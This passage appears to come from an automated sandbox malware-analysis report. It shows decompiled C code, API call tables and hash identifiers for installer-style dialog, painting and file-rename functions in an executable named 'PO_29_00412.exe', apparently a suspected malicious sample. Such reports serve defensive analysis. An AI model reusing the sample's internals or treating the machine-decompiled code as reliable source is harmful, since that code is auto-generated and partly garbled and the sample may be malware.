					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x420d30, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420d30,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404313(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x423f18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x4247ec - _t134;
										if( *0x4247ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x420120 = 1;
											L21:
											_push(0x78);
											L22:
											E00404285();
											goto L26;
										}
										E0040140B(_t128);
										 *0x420120 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x423f18);
						 *0x423f18 = _a12;
						L58:
						if( *0x421d50 == _t134) {
							_t143 =  *0x423f18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x421d50 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                                            0x00403de1
                                                                            0x00403dea
                                                                            0x00403f2b
                                                                            0x00403f2f
                                                                            0x00403f33
                                                                            0x00403f35
                                                                            0x00403f3a
                                                                            0x00403f45
                                                                            0x00403f50
                                                                            0x00403f55
                                                                            0x00403f57
                                                                            0x00403f59
                                                                            0x00403f5c
                                                                            0x00403f61
                                                                            0x00403f6f
                                                                            0x00403f7c
                                                                            0x00403f83
                                                                            0x00403f83
                                                                            0x00403f84
                                                                            0x00403f84
                                                                            0x00403f89
                                                                            0x00403f8f
                                                                            0x00403f96
                                                                            0x00403f9c
                                                                            0x00403f9e
                                                                            0x00403fde
                                                                            0x00403fe3
                                                                            0x00403fe8
                                                                            0x00403fe8
                                                                            0x00403fed
                                                                            0x00403ff6
                                                                            0x00403ff8
                                                                            0x00403ffd
                                                                            0x00404003
                                                                            0x00404007
                                                                            0x00404007
                                                                            0x0040400c
                                                                            0x00404012
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040401d
                                                                            0x00404023
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040402c
                                                                            0x00404034
                                                                            0x00404039
                                                                            0x0040403c
                                                                            0x00404042
                                                                            0x00404047
                                                                            0x0040404a
                                                                            0x00404050
                                                                            0x00404055
                                                                            0x00404058
                                                                            0x0040405e
                                                                            0x00404066
                                                                            0x0040406c
                                                                            0x00404072
                                                                            0x00404076
                                                                            0x0040407d
                                                                            0x0040407d
                                                                            0x0040407d
                                                                            0x00404087
                                                                            0x00404099
                                                                            0x004040a5
                                                                            0x004040aa
                                                                            0x004040b4
                                                                            0x004040ba
                                                                            0x004040bc
                                                                            0x004040c1
                                                                            0x004040be
                                                                            0x004040be
                                                                            0x004040be
                                                                            0x004040d1
                                                                            0x004040e9
                                                                            0x004040eb
                                                                            0x004040f1
                                                                            0x00404106
                                                                            0x004040f3
                                                                            0x004040fc
                                                                            0x004040fe
                                                                            0x004040fe
                                                                            0x0040410c
                                                                            0x0040411d
                                                                            0x0040412e
                                                                            0x00404135
                                                                            0x0040413f
                                                                            0x00404144
                                                                            0x00404146
                                                                            0x00000000
                                                                            0x0040414c
                                                                            0x0040414c
                                                                            0x0040414e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404154
                                                                            0x00404158
                                                                            0x0040417d
                                                                            0x00404183
                                                                            0x00404189
                                                                            0x0040418b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004041b1
                                                                            0x004041b7
                                                                            0x004041b9
                                                                            0x004041be
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004041c4
                                                                            0x004041c7
                                                                            0x004041ca
                                                                            0x004041e1
                                                                            0x004041ed
                                                                            0x00404206
                                                                            0x00404210
                                                                            0x00404215
                                                                            0x0040421b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404225
                                                                            0x00404230
                                                                            0x00000000
                                                                            0x00404230
                                                                            0x0040415a
                                                                            0x00404160
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404166
                                                                            0x0040416c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404172
                                                                            0x00404146
                                                                            0x0040423d
                                                                            0x00404249
                                                                            0x00404250
                                                                            0x00000000
                                                                            0x00403fa0
                                                                            0x00403fa0
                                                                            0x00403fa3
                                                                            0x00403fd6
                                                                            0x00403fd6
                                                                            0x00403fd8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403fd8
                                                                            0x00403fa9
                                                                            0x00403fae
                                                                            0x00403fb0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403fc0
                                                                            0x00403fc8
                                                                            0x00000000
                                                                            0x00403fce
                                                                            0x00403dfc
                                                                            0x00403dfc
                                                                            0x00403e00
                                                                            0x00403e05
                                                                            0x00403e14
                                                                            0x00403e14
                                                                            0x00403e1d
                                                                            0x00403e26
                                                                            0x00403e31
                                                                            0x00403e31
                                                                            0x00403e3d
                                                                            0x00403e59
                                                                            0x00403e5c
                                                                            0x00403e6f
                                                                            0x00403e75
                                                                            0x00403f18
                                                                            0x00000000
                                                                            0x00403f21
                                                                            0x00403e7b
                                                                            0x00403e88
                                                                            0x00403e8a
                                                                            0x00403e8c
                                                                            0x00403eab
                                                                            0x00403eab
                                                                            0x00403eae
                                                                            0x00403eb3
                                                                            0x00403eb6
                                                                            0x00403ec6
                                                                            0x00403ec7
                                                                            0x00403ec9
                                                                            0x00403eff
                                                                            0x00403f12
                                                                            0x00000000
                                                                            0x00403f12
                                                                            0x00403ecb
                                                                            0x00403ed1
                                                                            0x00403eea
                                                                            0x00403eef
                                                                            0x00403ef1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403ef3
                                                                            0x00403edf
                                                                            0x00403edf
                                                                            0x00403ee1
                                                                            0x00403ee1
                                                                            0x00000000
                                                                            0x00403ee1
                                                                            0x00403ed4
                                                                            0x00403ed9
                                                                            0x00000000
                                                                            0x00403ed9
                                                                            0x00403eb8
                                                                            0x00403ebe
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403ec0
                                                                            0x00000000
                                                                            0x00403ec0
                                                                            0x00403eb0
                                                                            0x00000000
                                                                            0x00403eb0
                                                                            0x00403e96
                                                                            0x00403e9d
                                                                            0x00403ea3
                                                                            0x00403ea5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403ea5
                                                                            0x00403e61
                                                                            0x00000000
                                                                            0x00403e3f
                                                                            0x00403e45
                                                                            0x00403e4f
                                                                            0x00404256
                                                                            0x0040425c
                                                                            0x0040425e
                                                                            0x00404264
                                                                            0x00404269
                                                                            0x0040426f
                                                                            0x0040426f
                                                                            0x00404264
                                                                            0x00404279
                                                                            0x00000000
                                                                            0x00404279
                                                                            0x00403e3d

                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E14
                                                                            • ShowWindow.USER32(?), ref: 00403E31
                                                                            • DestroyWindow.USER32 ref: 00403E45
                                                                            • SetWindowLongA.USER32 ref: 00403E61
                                                                            • GetDlgItem.USER32 ref: 00403E82
                                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403E96
                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403E9D
                                                                            • GetDlgItem.USER32 ref: 00403F4B
                                                                            • GetDlgItem.USER32 ref: 00403F55
                                                                            • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403F6F
                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FC0
                                                                            • GetDlgItem.USER32 ref: 00404066
                                                                            • ShowWindow.USER32(00000000,?), ref: 00404087
                                                                            • EnableWindow.USER32(?,?), ref: 00404099
                                                                            • EnableWindow.USER32(?,?), ref: 004040B4
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040CA
                                                                            • EnableMenuItem.USER32 ref: 004040D1
                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 004040E9
                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 004040FC
                                                                            • lstrlenA.KERNEL32(00420D50,?,00420D50,00000000), ref: 00404126
                                                                            • SetWindowTextA.USER32(?,00420D50), ref: 00404135
                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404269
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                            • String ID: PB
                                                                            • API String ID: 184305955-3196168531
                                                                            • Opcode ID: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                                                                            • Instruction ID: 6f64ab7c90c2728ca861f65b52108cf4a96aadf8bbc29eaef7369c8c365bd3a4
                                                                            • Opcode Fuzzy Hash: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                                                                            • Instruction Fuzzy Hash: F2C1C2B1A00300BFDB216F61EE45D2B3AB8EB85746F41053EF641B51F1CB3999829B5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404417, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 93%
                                                                            			E00404417(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x41fd1c =  *0x41fd1c + 1;
								__eflags =  *0x41fd1c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404313(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x4236e0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									_t40 =  &_v8; // 0x4236e0
									E004046BB(_a4,  *_t40);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x424748, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x424748, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x41fd1c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x420528 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E004042CE(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E00404697();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x423f1c; // 0x71ad46
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x424798;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E004043E2;
					E004042AC(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E004042AC(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E004042CE( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E004042E1(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x424754 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x41fd1c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x41fd1c = 0;
					return 0;
				}
			}



















                                                                            0x00404427
                                                                            0x00404539
                                                                            0x0040454c
                                                                            0x004045a8
                                                                            0x004045a8
                                                                            0x004045ac
                                                                            0x00404672
                                                                            0x00404679
                                                                            0x0040467b
                                                                            0x0040467b
                                                                            0x0040467b
                                                                            0x00404681
                                                                            0x00404681
                                                                            0x00404684
                                                                            0x00000000
                                                                            0x0040468b
                                                                            0x004045ba
                                                                            0x004045bc
                                                                            0x004045bf
                                                                            0x004045c6
                                                                            0x004045c8
                                                                            0x004045cf
                                                                            0x004045d1
                                                                            0x004045d4
                                                                            0x004045d7
                                                                            0x004045dc
                                                                            0x004045e2
                                                                            0x004045e5
                                                                            0x004045ec
                                                                            0x004045fa
                                                                            0x00404612
                                                                            0x00404614
                                                                            0x00404616
                                                                            0x0040461c
                                                                            0x0040462b
                                                                            0x0040462d
                                                                            0x0040462d
                                                                            0x004045ec
                                                                            0x004045cf
                                                                            0x00404630
                                                                            0x00404637
                                                                            0x00000000
                                                                            0x00404639
                                                                            0x00404639
                                                                            0x00404640
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404642
                                                                            0x00404646
                                                                            0x00404657
                                                                            0x00404657
                                                                            0x00404659
                                                                            0x0040465d
                                                                            0x0040466b
                                                                            0x0040466b
                                                                            0x00000000
                                                                            0x0040466f
                                                                            0x00404637
                                                                            0x00404554
                                                                            0x00404557
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040455f
                                                                            0x00404565
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404571
                                                                            0x00404574
                                                                            0x00404577
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040459a
                                                                            0x0040459a
                                                                            0x0040459c
                                                                            0x0040459e
                                                                            0x004045a3
                                                                            0x00000000
                                                                            0x0040442d
                                                                            0x0040442d
                                                                            0x00404430
                                                                            0x00404435
                                                                            0x00404437
                                                                            0x00404446
                                                                            0x00404446
                                                                            0x0040444d
                                                                            0x00404450
                                                                            0x00404452
                                                                            0x00404457
                                                                            0x00404460
                                                                            0x00404466
                                                                            0x00404472
                                                                            0x00404475
                                                                            0x0040447e
                                                                            0x00404483
                                                                            0x00404486
                                                                            0x0040448b
                                                                            0x004044a2
                                                                            0x004044a9
                                                                            0x004044bc
                                                                            0x004044bf
                                                                            0x004044d4
                                                                            0x004044db
                                                                            0x004044e0
                                                                            0x004044e5
                                                                            0x004044e5
                                                                            0x004044f4
                                                                            0x00404503
                                                                            0x00404515
                                                                            0x0040451a
                                                                            0x0040452a
                                                                            0x0040452c
                                                                            0x00000000
                                                                            0x00404532

                                                                            APIs
                                                                            • CheckDlgButton.USER32 ref: 004044A2
                                                                            • GetDlgItem.USER32 ref: 004044B6
                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044D4
                                                                            • GetSysColor.USER32(?), ref: 004044E5
                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004044F4
                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404503
                                                                            • lstrlenA.KERNEL32(?), ref: 00404506
                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404515
                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040452A
                                                                            • GetDlgItem.USER32 ref: 0040458C
                                                                            • SendMessageA.USER32(00000000), ref: 0040458F
                                                                            • GetDlgItem.USER32 ref: 004045BA
                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004045FA
                                                                            • LoadCursorA.USER32 ref: 00404609
                                                                            • SetCursor.USER32(00000000), ref: 00404612
                                                                            • LoadCursorA.USER32 ref: 00404628
                                                                            • SetCursor.USER32(00000000), ref: 0040462B
                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404657
                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040466B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                            • String ID: N$6B
                                                                            • API String ID: 3103080414-649610290
                                                                            • Opcode ID: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                                                                            • Instruction ID: 4db3d1b8578fb28e8129a2e139a0a5bbbdeef9899b51b491bef805f45c6f40d7
                                                                            • Opcode Fuzzy Hash: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                                                                            • Instruction Fuzzy Hash: 5761B2B1A00209BFDB109F61DD45F6A3B69EB85310F11843AFB01BA2D1D7BD9952CF98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405E97, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 129memorystringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405E97(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x422ae0 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x422ee0
					_t12 = GetShortPathNameA( *_t2, 0x422ee0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4226e0, "%s=%s\r\n", 0x422ae0, 0x422ee0);
						_t53 = _t52 + 0x10;
						E004062BB(_t37, 0x400, 0x422ee0, 0x422ee0,  *((intOrPtr*)( *0x424754 + 0x128)));
						_t12 = E00405DC1(0x422ee0, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E39(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D26(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D26(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D7C(_t24 + _t46, 0x4226e0, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E68(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DC1(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x422ae0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                            0x00405e97
                                                                            0x00405ea0
                                                                            0x00405ea7
                                                                            0x00405ebb
                                                                            0x00405ee3
                                                                            0x00405eea
                                                                            0x00405eee
                                                                            0x00405ef2
                                                                            0x00405f12
                                                                            0x00405f19
                                                                            0x00405f23
                                                                            0x00405f30
                                                                            0x00405f35
                                                                            0x00405f3a
                                                                            0x00405f3e
                                                                            0x00405f4d
                                                                            0x00405f4f
                                                                            0x00405f5c
                                                                            0x00405f60
                                                                            0x00405ffb
                                                                            0x00000000
                                                                            0x00405f76
                                                                            0x00405f83
                                                                            0x00405fa7
                                                                            0x00405fab
                                                                            0x00405fca
                                                                            0x00405fce
                                                                            0x00405fce
                                                                            0x00405fd0
                                                                            0x00405fd9
                                                                            0x00405fe4
                                                                            0x00405fef
                                                                            0x00405ff5
                                                                            0x00000000
                                                                            0x00405ff5
                                                                            0x00405fad
                                                                            0x00405fb0
                                                                            0x00405fbb
                                                                            0x00405fb7
                                                                            0x00405fb9
                                                                            0x00405fba
                                                                            0x00405fba
                                                                            0x00405fc2
                                                                            0x00405fc4
                                                                            0x00000000
                                                                            0x00405fc4
                                                                            0x00405f8e
                                                                            0x00405f94
                                                                            0x00000000
                                                                            0x00405f94
                                                                            0x00405f60
                                                                            0x00405f3e
                                                                            0x00405ebd
                                                                            0x00405ec8
                                                                            0x00405ed1
                                                                            0x00405ed5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405ed5
                                                                            0x00406006

                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406028,?,?), ref: 00405EC8
                                                                            • GetShortPathNameA.KERNEL32 ref: 00405ED1
                                                                              • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                                                                              • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                                                                            • GetShortPathNameA.KERNEL32 ref: 00405EEE
                                                                            • wsprintfA.USER32 ref: 00405F0C
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00422EE0,C0000000,00000004,00422EE0,?,?,?,?,?), ref: 00405F47
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F56
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F8E
                                                                            • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,004226E0,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
                                                                            • GlobalFree.KERNEL32 ref: 00405FF5
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405FFC
                                                                              • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\PO_29_00412.exe,80000000,00000003), ref: 00405DC5
                                                                              • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %s=%s$[Rename]$*B$.B$.B
                                                                            • API String ID: 2171350718-3836630945
                                                                            • Opcode ID: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                                                                            • Instruction ID: e10df20c38e6db669e3e204b33f1f32e55eddbf12f2a20f16207bac721f49ac6
                                                                            • Opcode Fuzzy Hash: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                                                                            • Instruction Fuzzy Hash: EA310331200B167BD2206B659E4DF6B3A5CDF45758F14043BF942F62D2EE7CE8118AAD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 90%
                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x424754;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
